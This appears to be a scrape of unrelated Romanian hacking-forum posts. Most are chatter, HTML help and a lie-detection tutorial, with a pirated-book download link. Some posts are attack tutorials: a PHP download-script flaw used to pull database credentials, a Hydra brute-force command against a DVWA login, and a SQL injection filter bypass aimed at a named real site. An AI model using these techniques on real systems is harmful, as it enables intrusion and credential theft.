ZeroCold

Securing the Cloud Cloud Computer Security Techniques and Tactics PDF 6.9mb | 2011 | Vic (J.R.) Winkler BOOK DESCRIPTION As companies turn to cloud computing technology to streamline and save money, security is a fundamental concern. Loss of certain control and lack of trust make this transition difficult unless you know how to handle it. Securing the Cloud discusses making the move to the cloud while securing your peice of it! The cloud offers felxibility, adaptability, scalability, and in the case of security-resilience. This book details the strengths and weaknesses of securing your company's information with different cloud approaches. Attacks can focus on your infrastructure, communications network, data, or services. The author offers a clear and concise framework to secure your business' assets while making the most of this new technology. KEY FEATURES Provides a sturdy and stable framework to secure your piece of the cloud, considering alternate approaches such as private vs. public clouds, SaaS vs. IaaS, and loss of control and lack of trust Discusses the cloud's impact on security roles, highlighting security as a service, data backup and disaster recovery Details the benefits of moving to the cloud-solving for limited availability of space, power and storage AUTHOR INFORMATION Vic (J.R.) Winkler is a Senior Associate at Booz Allen Hamilton, providing technical consultation to U.S. Government clients. He is a published InfoSec and cyber security researcher as well as an expert in intrusion/anomaly detection. At Sun Microsystems, Vic served as the Chief Technologist for Security for the Sun Public Cloud. He was also Chairman of the Board for the Sun Security Technology Ambassador program (presales security engineers). In 2010, he became a member of the Advisory Board for StratuScape (a Silicon Valley startup). Vic's background includes positions as an R&D principal investigator at Planning Research Corporation (PRC), where he was the lead designer and Program Manager for a trusted B1 UNIX OS. At PRC, he also conceived of and built one of the first network/host Intrusion Detection Systems (IDS). Vic has over 30 years' experience in InfoSec/cyber security, cloud computing, systems and applications engineering, IT operations and management. He has numerous technical conference publications, and as a visiting cyber security expert, Vic was the author of the Information Security policy for the Government of Malaysia. TABLE OF CONTENTS Securing the Cloud: Cloud Computer Security Techniques and Tactics Copyright Dedication Acknowledgments About the Author About the Technical Editor Introduction Book Audience Terminology Risk, Perception of Risk and Cloud Computing Cloud Computing as a Tectonic Shift Structure of the Book Chapters in This Book Chapter 1: Introduction to Cloud Computing and Security Chapter 2: Cloud Computing Architecture Chapter 3: Security Concerns, Risk Issues, and Legal Aspects Chapter 4: Securing the Cloud: Architecture Chapter 5: Securing the Cloud: Data Security Chapter 6: Securing the Cloud: Key Strategies and Best Practices Chapter 7: Security Criteria: Building an Internal Cloud Chapter 8: Security Criteria: Selecting an External Cloud Provider Chapter 9: Evaluating Cloud Security: An Information Security Framework Chapter 10: Operating a Cloud DOWNLOAD http://www.multiupload.com/GKQWL7KHEE

Nu cred ca ai inteles ce vreau sa zic. Vreau sa fac un tabel care sa arate asa. Iar atunci cand scriu in el sa se redimensioneze automat. Nu vreau sa ii dau background, vreau sa ii setez doar border, marginile si colturile, sa pun imagini mici. Iar marginile sa fie cu repeat (aici ma pricep si eu).Nu stiu cum sa ii setez marginile ca fiind imagini. Exemplu: .marginestanga { background: url(plm.gif) repeat} .marginedreapta { background: url(plm.gif) repeat} .coltstangasus {background: url(plm.gif)} etc. Apoi astea sa le aplic la tabel <table>. ___ Si referitor la cealalta intrebare. vreau ca atunci cand afisez o imagine cu div, sa imi ia ca referire margina tabelului, nu marginea ecranului. ___ Mai pe scurt, vreau sa fac un template simplu, cu tabele, care sa fie asezat pe centrul ecranului, sa se vada pe centru indiferent de rezolutia pe care o are utilizatorul. Iar background-ul site-ului sa fie cu glow si dinamic. Pot face asta? cum? Multumesc!

Cum pot sa setez marginile si colturile unui tabel, sa pun imagini? Am facut o poza: Am cate 1 imagine mica, cum pot sa setez ca acea imagine sa fie coltul din stanga sus al unui tabel? respectiv marginea din stanga, dreapta.. etc Iar marginile sa se repete, iar in final tabelul meu sa arate asa: Si inca o intrebare, pot sa aliniez anumite imagini cu div-uri in functie de marginile tabelului? cum fac? Multumesc!

Aceasta vulnerabilitate apare in functia de descarcare a unui fisier local, un exemplu clar ar fi: <?php $arhiva = $_GET['file']; if (strstr($HTTP_USER_AGENT, "MSIE")){ $attachment = ""; }else{ $attachment = " attachment;"; } $filesize = filesize($arhiva); if($filesize) { Header("Content-Type: application/x-ms-download"); Header("Content-Length: ".$filesize); Header("Content-Disposition: attachment; filename=".$arhiva); @readfile($arhiva); exit; } ?> Pentru a descarca un fisier se foloseste urmatorul link: http://www.web.com/download.php?arhiva=/docs/fisier.pdf Asa... dupa cum vedeti, acest script permite descarcarea fisierelor de pe server. Cum putem folosi acest lucru in avantajul nostru? Simplu, descarcam index.php http://www.web.com/download.php?arhiva=index.php La ce ne ajuta? Pai ne ajuta, dupa ce l-am descarcat, il deschidem cu notepad sau alt editor si cautam dupa require_once. Ca o paranteza: Spre exemplu gasim: require_once('/intranet/librerias/db_mysql.inc.php'); Avem fisierul db_mysql.inc.php si locatia lui. Il descarcam: http://www.web.com/download.php?arhiva=/intranet/librerias/db_mysql.inc.php Il deschidem cu un editor: <?php $dbuser='root'; $dbpass='rst123'; $dbname='forum_rst'; if (!mysql_connect("localhost","$dbuser","$dbpass")) { echo "Eroare, nu ma pot conecta la baza de date."; exit(); } if (!mysql_select_db("$dbname")) { echo "Eroare, baza de date nu exista."; exit(); } ?> Am gasit numele bazei de date, userul si parola . Acesta este un exemplu simplu despre modul in care puteti obtine informatii critice cu ajutorul vulnerabilitatii SCD.

Source Code Disclosure over HTTP Exploiting the Download Page TABLE OF CONTENTS • Abstract ............................................................... 3 • Introduction ......................................................... 3 • A Likely Scenario................................................... 3 • The Exploit ........................................................... 6 • The Impact........................................................... 9 • Recommended Resolutions ................................. 10 • About The Author ................................................ 10 • About SecurEyes ................................................. 10 http://www.secureyes.net/downloads/Source_Code_Disclosure_over_HTTP.pdf

Web Form Password Brute Force with FireForce I spent many hours today playing around with DVWA – (Damn Vulnerable Web App), from Randomstorm, brushing up on my web app pentesting skills, to be honest its been a long time and I really need to get back on top of this. Anyways, after going through all the usual SQL injection, XSS stuff I thought I’d have a go at the brute forcing part of the app. Well after what seemed like days I gave up, with little or no success – I’d tried the usual suspect for ‘bruting’ the password – Hydra. Until I Googled around and found a Firefox addon called ‘Fireforce’ the article that I found is here Dark Reading. The website for the tool is here SCRT ,there is a manual in english too. What the extension does is finds out the fields for the brute force attack in the web page source code, an automated way rather than reading through it manually, and then tries to brute force using your wordlists. You can view the source code for the webpage by right clicking on the page and selecting View page source. Here you can pick out the form action ‘GET’ and the password, username and submit info. This is what you would normally feed into Hydra, as shown here: -hydra -l admin -P wordlist.txt -f -v 192.168.124.123 http-get-form “/vulnerabilities/brute/:username=^USER^&password=^PASS^&submit=Login:Username and/or Password incorrect.” So to Fireforce, best read the manual for all options, but really all you have to do once its installed is right click in the fields for username and password and load up your wordlists for usernames and passwords and let it rip. Et Viola After a bit more reading after publishing this post, I found out that Hydra falls a little short when dealing with web forms, an article I found on the excellent Attack Vector blog, Mat also had issues with Hydra and web forms. $Sursa: aici.

Am dat peste acest site azi dimineata, la ora de informatica... "Nimic nu se invata usor daca nu e bine explicat" site

Ceva de genu am vrut sa zic si eu, prostia, ignoranta, lenea.. etc de fapt, noi ne distrugem viata nu tehnologia. Tehnologia doar ne ajuta, noi alegem felul in care o facem, bine sau rau. Un exemplu clar e cel cu "Mesajele soferilor". Ai masina, te poti deplasa usor dintr-un loc in altul, de tine depinde cum o faci (o calci ca taranu sau conduci regulamentar | te urci baut la volan sau te urci treaz | dai sms-uri la volan si nu esti atent sau iti iei casca si dai telefon... sau tragi pe dreapta si dai sms-ul). Cred ca ati inteles ce am vrut sa zic.

Nu ma, ce depresie mi s-a parut interesant... si atat

Acesta este un exemplu despre cum se poate evita filtru aplicat de server împotriva SQLi. Cererea este blocat? de c?tre filtru: http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 2) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- zoom Cererea trece de filtru ?i este executata de MySQL: http://rareconservation.org/news/article.php?id=34 and (select 1) = (select 0x4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141) union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- zoom ########################## Site-ul dat ca exemplu numai este vulnerabil. Credite: tdxev Sursa: aici.

Am primit mass de la un prieten cu clipul, mi s-a parut interesant si cred ca multora le-ar prinde bine. Video .

Pai da, deoarece copiii stau cu parintii aproape tot timpul, pana la 18 ani stau in casa cu ei, vorbesc in fiecare zi cu ei, mananca cu ei etc. Tre sa fii prost rau sa nu iti dai seama cand mata sau tactu te minte. (si nu ma refera la minciuni gen "Vine mosu..") Si nu doar copiii. Vorbesti cu o pizda, se muta cu tine... va intelegeti perfect, stati impreuna 5-6 ani (vorbiti zi de zi, mancati impreuna, dormiti impreuna, va futeti etc.). Dupa atata timp crezi ca nu isi da seama cand o minti. Totul tine de cat de mult cunosti persoana cu care discuti

Ai vazut vreun episod din serialul Lie to me? Daca da, probabil ai ramas putin mirat de modul in care personajul principal reuseste sa “citeasca” oamenii si scoate la iveala si cea mai bine ascunsa minciuna. Ideea filmului pleaca de la premisa ca subconstientul nostru actioneaza autonom fata de actul verbal, influentand modul in care corpul se comporta atunci cand spunem o minciuna. Reactiile sunt inconstiente si destul de greu de controlat, mai ales daca persoana nu are experienta in spusul minciunilor. Exista insa si oameni care sunt adevarati asi in modelarea propriului corp, astfel incat acesta sa actioneze in conformitate cu cuvintele rostite. Exista insa cateva elemente de baza pe care le poti folosi in avantajul tau. LINIA DE BAZA Inainte sa te apuci sa detectezi semnalele, stabileste o linie de baza, sau cum s-ar spune in limbajul de specialitate “calibreaza” persoana respectiva, pentru ca nu toata lumea actioneaza in mod similar si s-ar putea sa fii indus in eroare. Daca nu cunosti foarte bine persoana cu care porti dialogul, pune initial intrebari banale, cum i se pare vremea afara sau ce a mancat la pranz. Vezi cum se comporta in situatii uzuale si abia apoi treci la intrebari mai delicate. Daca atunci cand ajungi la acestea, individul se comporta diferit, atunci poti incepe sa fii atent la semnalele corpului si a modului in care isi expune raspunsul. PRIVIREA In mod uzual, exista parerea conform careia persoanele care mint nu isi pot privi in ochi interlocutorul, sau evita cat mai mult contactul vizual direct. Poate fi si acesta un punct de pornire, insa sunt persoane care cunosc acest fapt si atunci, din conta, pastreaza contactul prea mult timp, fix. Daca ti se pare ca persoana pastreaza un contact prea intens, uita chiar sa si clipeasca, atunci exista posibilitatea sa te minta. In al doilea rand, fii atent la directia in care persoana isi arunca privirea atunci cand ii pui o intrebare. Momentul dureaza numai o secunda si este facut inconstient. Daca persoana isi arunca privirea in partea stanga atunci aceasta spune adevarul, iar daca isi arunca privirea in partea dreapta atunci isi imagineaza raspunsul, sau te minte. Acest fapt este legat de faptul ca emisfera stanga a creierul este cea care retine faptele, memoreaza, in timp ce emisfera dreapta este cea care se ocupa cu imaginatia. Astfel daca se uita in partea stanga, incearca sa isi aduca aminte ceva, sa extraga din memorie iar daca se uita in partea dreapta incearca sa isi imagineze, sa formeze pe loc un raspuns. Dar fii atent, nu toate persoanele actioneaza la fel! De accea este important mai intai sa stabilesti linia de baza. MISCAREA MAINILOR In al doilea rand fii atent la miscarea mainilor si a picioarelor. Cei care mint, au tendinta de a face ceva cu mainile, de a le tine ocupate (joaca cu parul, cu un cercel, cu un inel). In acelasi mod, au tendinta de a-si misca constant picioarele, de a le pozitiona mereu diferit. Asta pentru ca in interior devine agitat si trebuie sa isi foloseasca corpul pentru a nu se da de gol. Daca corpul sau nu transmite nimic, fii atunci atent la modul in care isi expune povestirea. DETALII IN EXCES Daca acesta minte, are tendinta de a da mai multe detalii decat i-ai cerut, de a povesti chiar daca tu nu intrebi in mod direct anumite fapte. Este o modalitate prin care el incearca cu toata forta sa te convinga de ceea ce spune. REACTIA LA INTREBARE Vezi cum reactioneaza atunci cand ii pui o intrebare. Daca persoana nu are nimic de ascuns, iti va raspunde sincer si linistit. In caz contrat, se poate sa actioneze chiar violent verbal, va trece pe pozitia de atac, spunandu-ti ca ai ceva cu el, ca il acuzi pe nedrept, ca pui prea multe intrebari sau ca esti indiscret. Asta pentru ca se simt inconfortabil cu intrebarea ta si incearca sa faca orice pentru a iesi din situatie, aruncand vina in ograda ta. FORMULAREA RASPUNSULUI Fii atent si la modul in care isi formuleaza raspunsul. S-ar putea sa iti spuna adevarul, sa actioneze linistit, dar de fapt nu va face altceva decat sa deraieze intrebarea (de exemplu: sotul isi intreaba sotia daca l-a inselat vreodata. Aceasta ii poate raspunde linistita: “dar eu te iubesc si vreau sa stau cu tine toata viata”. Este o modalitate diplomata de a nu raspunde la intrebare si chiar de a impaca cealalta persoana in mod constient). Sau va incerca sa schimbe cat mai rapid subiectul, parand foarte interesat de orice altceva decat ceea ce il intrebi tu. Toate aceste fapte depind insa de fiecare persoana in parte, de contextul general in care se desfasoara discutia si de relatia intre cele doua persoane. Este mai bine sa cauti mai multe informatii daca tu crezi ca persoana respectiva te minte, decat sa o etichetezi in mod direct. Si cel mai important, persoana poate reactiona in modul descris mai sus, doar daca este constienta ca minte. ___ Cititi si reply-urile din topicul asta. Sursa de unde am copiat tutorialul aici.

Ce am gasit pe net: Si inca 2 chestii: - daca cunosti persoana e mai usor, stii cum se comporta in mod obisnuit si daca esti atent vei observa cand apare o shimbare. - daca nu o cunosti ii pui mai intai intrebari banale gen "Ce mai faci?", vezi cum se comporta apoi treci la intrebari mai serioase gen "auzi, tu o futi pe gagicamea?? a???" apoi fii atent la comportament. Am mai gasti un tutorial frumos, il postez acusi . _____________________ Edit: Referitor la exemplul tau. 1. a) Bianca minte deoarece exagereaza "ea nu s-a atins de ciocolata", putea sa spuna linistit "bre, nu am mancat-o eu". Bianca arunca vina asupra altei persoane "Alex a mancat-o". c) Doua persoane acuza una. Bianca minte. 2. a) Tudor si Alex au mancat ciocolata, apoi dau vina pe Bianca. 3. a) Majoritatea femeilor mint. Binaca minte. ___ Din 1,2 si 3 => ca Bianca minte. *Parerea mea.

Asa m-am gandit si eu, e mica suma... dar macar voi mai invata cate ceva. Invat mai usor atunci cand lucrez la ceva. Prima data cand am auzit 400 ron pt site-ul scolii, am zis ca ard un wordpress sau un joomla si am luat banii dar dupa ce am vazut cerintele

Jicule, pana acu te-am inteles, ai ceva cu nytro... ai facut 1 post ai zis ca-i gabor, ai mai facut unu ai mai zis nus ce de el. Cand ai de gand sa termini? Eu sincer m-am saturat sa tot vad ca te plangi ca o pizda in nspe mii de posturi. Fa unu singur si plangi acolo. Crezi ca mie sau altuia de pe forum ii pasa ca nytro ii gabor sau nu? crezi ca ii pasa daca ii turnator sau nu?? Mie sincer ma doare undeva de voi si nu ma intereseaza chestiile astea, postati si voi un tutorial ceva, o stire, faceti offtopic da nu va plangeti ca pizdele. @conducerea, nu va inteleg

La mine s-a organizat concurs, cine il face cel mai ok are 400 ron De aia am facut topicul asta...

Trebuie sa fac site-ul scolii si as vrea sa stiu si parerea voastra. 1. Care credeti ca este cel mai bun site scolar din romania? (structura, aspect..) 2. Cum ar trebui sa arate sau ce ar trebui sa cuprinda un site scolar dupa parerea voastra? Multumesc!

@ripoff.. si restu, Fun Stuff e sticky.

Treci pe orange Orange Ce am eu : - 90 sms nationale - 49h 49 min 22 sec in retea - acces nelimitat la muzica nelimiteaza-te.ro - sms nelimitat in retea - 1h 30 min nationale si internationale + retele fixe UE, SUA, Canada - 90 eurocenti bonusu.. cred - 82 eurocenti credit - yahoo mail, yahoo mess, retele sociale acces nelimitat - 20MB alte siteuri... Toate alea 1 luna/ 7 euro.

Ce ma, n-ati mai vazut batai intre pizde?

Al meu e cel mai sexy tune up 06 + rainmeter

- in timpul saptamanii 6-7 ore. - in weekend 10-15. - in vacanta 24/24 7/7

De cate ori este necesar. La fel ca Birkoff, 10-16 ore la PC cand nu am scoala. Ma spal pe maini cand ma duc la wc, in rest noo... doar daca ma murdaresc, de obicei sunt atent . De ceva vreme stau mai putin la pc fiindca am inceput sa fac basket, dupa basket dus... Iar cand am scoala, la fel.. cand ma murdaresc, dupa ora de sport, wc... si-atat. off: